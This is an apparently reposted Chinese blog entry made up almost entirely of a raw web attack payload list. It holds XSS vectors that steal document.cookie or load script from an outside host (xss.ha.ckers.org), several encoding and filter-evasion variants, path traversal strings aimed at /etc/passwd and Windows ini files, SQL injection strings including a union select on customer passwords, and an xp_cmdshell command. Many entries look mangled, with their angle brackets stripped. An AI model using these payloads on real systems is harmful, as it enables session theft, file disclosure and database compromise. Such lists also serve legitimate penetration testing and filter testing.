好像转过一篇吧。。。忘记了。。。复习下。

scriptalert(document.cookie)/script
=scriptalert(document.cookie)/script
scriptalert(document.cookie)/script
scriptalert(vulnerable)/script
3Cscript3Ealert(XSS)3C/script3E
s#99riptalert(XSS)/script
imgsrc="javas#99ript:alert(XSS)"
0a0ascriptalert(\"Vulnerable\")/script.jsp
223cscript3ealert(22xss22)3c/script3e
2e2e/2e2e/2e2e/2e2e/2e2e/2e2e/2e2e/etc/passwd
2E2E/2E2E/2E2E/2E2E/2E2E/windows/win.ini
3c/a3e3cscript3ealert(22xss22)3c/script3e
3c/title3e3cscript3ealert(22xss22)3c/script3e
3cscript3ealert(22xss22)3c/script3e/index.html
3f.jsp
3f.jsp
ltscriptgtalert(Vulnerable)lt/scriptgt
scriptalert(Vulnerable)/script
?sql_debug=1
a5c.aspx
a.jsp/scriptalert(Vulnerable)/script
a/
a?scriptalert(Vulnerable)/script
"scriptalert(Vulnerable)/script
execmaster..xp_cmdshelldirc:c:\inetpub\wwwroot\?.txt
223E3Cscript3Ealert(document.cookie)3C/script3E
3Cscript3Ealert(document.domain)3C/script3E
3Cscript3Ealert(document.domain)3C/script3ESESSION_ID={SESSION_ID}SESSION_ID=
1unionallselectpass,0,0,0,0fromcustomerswherefname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
!"XSS={()}
IMGSRC="javascript:alert(XSS)"
IMGsrc="/BLOG/javascript:alert"(XSS)
IMGsrc="/BLOG/JaVaScRiPt:alert"(XSS)
IMGsrc="/BLOG/JaVaScRiPt:alert"(quotXSSquot)
IMGSRC=#106#97#118#97#115#99#114#105#112#116#58#97#108#101#114#116#40#39#88#83#83#39#41
IMGSRC=#0000106#0000097#0000118#0000097#0000115#0000099#0000114#0000105#0000112#0000116#0000058#0000097#0000108#0000101#0000114#0000116#0000040#0000039#0000088#0000083#0000083#0000039#0000041
IMGSRC=#x6A#x61#x76#x61#x73#x63#x72#x69#x70#x74#x3A#x61#x6C#x65#x72#x74#x28#x27#x58#x53#x53#x27#x29
IMGSRC="jav#x09ascript:alert(XSS)"
IMGSRC="jav#x0Aascript:alert(XSS)"
IMGSRC="jav#x0Dascript:alert(XSS)"
"IMGsrc="/BLOG/java"\0script:alert(\"XSS\")"out
IMGSRC="javascript:alert(XSS)"
SCRIPTa=/XSS/alert(a.source)/SCRIPT
BODYBACKGROUND="javascript:alert(XSS)"
BODYONLOAD=alert(XSS)
IMGDYNSRC="javascript:alert(XSS)"
IMGLOWSRC="javascript:alert(XSS)"
BGSOUNDSRC="javascript:alert(XSS)"
brsize="{alert(XSS)}"
LAYERSRC="http://xss.ha.ckers.org/a.js"/layer
LINKREL="stylesheet"HREF="javascript:alert(XSS)"
IMGsrc="/BLOG/vbscript:msgbox"("XSS")
IMGSRC="mocha:[code]"
IMGsrc="/BLOG/livescript:[code]"
METAHTTP-EQUIV="refresh"CONTENT="0url=javascript:alert(XSS)"
IFRAMEsrc="/BLOG/javascript:alert"(XSS)/IFRAME
FRAMESETFRAMEsrc="/BLOG/javascript:alert"(XSS)/FRAME/FRAMESET
TABLEBACKGROUND="javascript:alert(XSS)"
DIVSTYLE="background-image:url(javascript:alert(XSS))"
DIVSTYLE="behaviour:url(http://www.how-to-hack.org/exploit.html)"
DIVSTYLE="width:expression(alert(XSS))"
STYLE@im\port\ja\vasc\ript:alert("XSS")/STYLE
IMGSTYLE=xss:expre\ssion(alert("XSS"))
STYLETYPE="text/javascript"alert(XSS)/STYLE
STYLETYPE="text/css".XSS{background-image:url("javascript:alert(XSS)")}/STYLEACLASS=XSS/A
STYLEtype="text/css"BODY{background:url("javascript:alert(XSS)")}/STYLE
BASEHREF="javascript:alert(XSS)//"
getURL("javascript:alert(XSS)")
a="get"b="URL"c="javascript:"d="alert(XSS)"eval(a+b+c+d)
XMLSRC="javascript:alert(XSS)"
"BODYONLOAD="a()"SCRIPTfunctiona(){alert(XSS)}/SCRIPT"
SCRIPTSRC="http://xss.ha.ckers.org/xss.jpg"/SCRIPT
IMGSRC="javascript:alert(XSS)"
!＃e xeccmd="/bin/echoSCRIPTSRC"!＃e xeccmd="/bin/echo=http://xss.ha.ckers.org/a.js/SCRIPT"
IMGSRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"
SCRIPTa=""SRC="http://xss.ha.ckers.org/a.js"/SCRIPT
SCRIPT=""SRC="http://xss.ha.ckers.org/a.js"/SCRIPT
SCRIPTa=""SRC="http://xss.ha.ckers.org/a.js"/SCRIPT
SCRIPT"a="SRC="http://xss.ha.ckers.org/a.js"/SCRIPT
SCRIPTdocument.write("SCRI")/SCRIPTPTSRC="http://xss.ha.ckers.org/a.js"/SCRIPT
AHREF=http://www.gohttp://www.google.com/ogle.com/link/A
admin
or0=0
"or0=0
or0=0
or0=0#
"or0=0#
or0=0#
orx=x
"or"x"="x
)or(x=x
or1=1
"or1=1
or1=1
ora=a
"or"a"="a
)or(a=a
")or("a"="a
hi"or"a"="a
hi"or1=1
hior1=1
hiora=a
hi)or(a=a
hi")or("a"="a